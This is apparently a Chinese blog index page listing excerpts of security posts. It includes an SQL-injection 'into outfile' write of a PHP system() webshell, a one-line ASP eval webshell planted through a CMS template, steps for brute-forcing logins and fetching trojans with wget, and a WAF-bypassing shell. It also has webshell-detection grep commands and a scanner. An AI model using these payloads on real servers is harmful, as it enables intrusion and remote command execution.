Deformity JSP Webshell、Webshell Hidden Learning
分类:
Web程序 时间:
2016-03-14 12:07:06
阅读次数:
175
sql注入获取webshell寻找sql注入页面,操作数据库的地方向网站写入sql语句' union select 1,2, '<?php system($_GET["cmd"]);?>' into outfile '/var/www/myzoo/cmd.php'发现mysql没有写入权限,于是在a
分类:
数据库 时间:
2016-03-07 20:48:02
阅读次数:
282
1.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find/storage/www/-name"*.php"|xargsgrep-in--color"eval("#grep-i--include=‘*.php‘-rsystem\s*\(/storage/www/2.统计访问日志中来自同ip出现的次数分析盗链、攻击、机器人#cataccess.log|awk‘{print..
分类:
其他好文 时间:
2016-02-01 22:41:00
阅读次数:
287
目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试) 进入后台找到模板页->管理自定义模板,如下图所示: 添加模板,内容如下:文件名填入:test.asp/ 内容填入:<%eval request("test")%> 在模板管理中找到模板的位置,如下图: 使用菜刀连接即可
分类:
Web程序 时间:
2016-01-31 21:47:49
阅读次数:
301
一、上传木马的过程1、默认端口22弱口令暴力破解;2、21端口或者3306端口弱口令暴力破解;3、webshell进行shell反弹提权;4、木马传入服务器的上面并且执行,通过木马的方式来控制你的服务器进行非法的操作。二、常见操作1、切入/tmp;2、wget下载木马;3、木马加载权限;4、执行木马...
分类:
系统相关 时间:
2016-01-27 12:25:41
阅读次数:
275
声明:此文档仅供安全学习和教学用途,禁止非法使用。wordpress的黑盒扫描器:wpscan实验效果:枚举用户列表、暴力破解用户密码、实验环境:靶机:TurnkeyLinux(wordpress版)攻击机:kalilinux2.0实验步骤:搭建靶机换机:1、下载镜像,官网https://www.turnkeylinux.org/搜..
分类:
其他好文 时间:
2016-01-25 17:33:47
阅读次数:
531
最近发现一款过狗shell,分享下。。。 本地搭建2008SERVER+php5+阿帕奇+网站安全狗+服务器安全狗+防护全开 测试可用。。。 默认密码:p0tt1 使用方法: 访问webshell页面,出现404,没关系,按p键,输入密码 或者webshell.php?password=p0tt1自...
分类:
Web程序 时间:
2016-01-23 22:54:49
阅读次数:
225
阅读目录工具介绍使用方法工具介绍这是一款全自动Web后门查杀工具,基于Python开发某些较新的后门可能会查杀失败规则列表来自seay博客回到顶部使用方法1.按恶意代码查杀: python Scan_webshell.py 目录名2.按修改时间查杀: python Scan_webshell.py ...
分类:
Web程序 时间:
2016-01-09 06:15:13
阅读次数:
235
Deformity ASP/ASPX Webshell、Webshell Hidden Learning
分类:
Web程序 时间:
2015-12-07 15:54:46
阅读次数:
422
quasibot是基于php的webshell管理工具,项目地址https://github.com/Smaash/quasibot,但在kalilinux下安装以后,默认主页就显示了一行标题,其它内容不显示。如图:设置了半天权限,发现没有半毛钱关系。这时想到查看error_log,满屏都在显示找不到curl_init():[FriNov0613:4..
分类:
系统相关 时间:
2015-11-06 23:39:03
阅读次数:
750
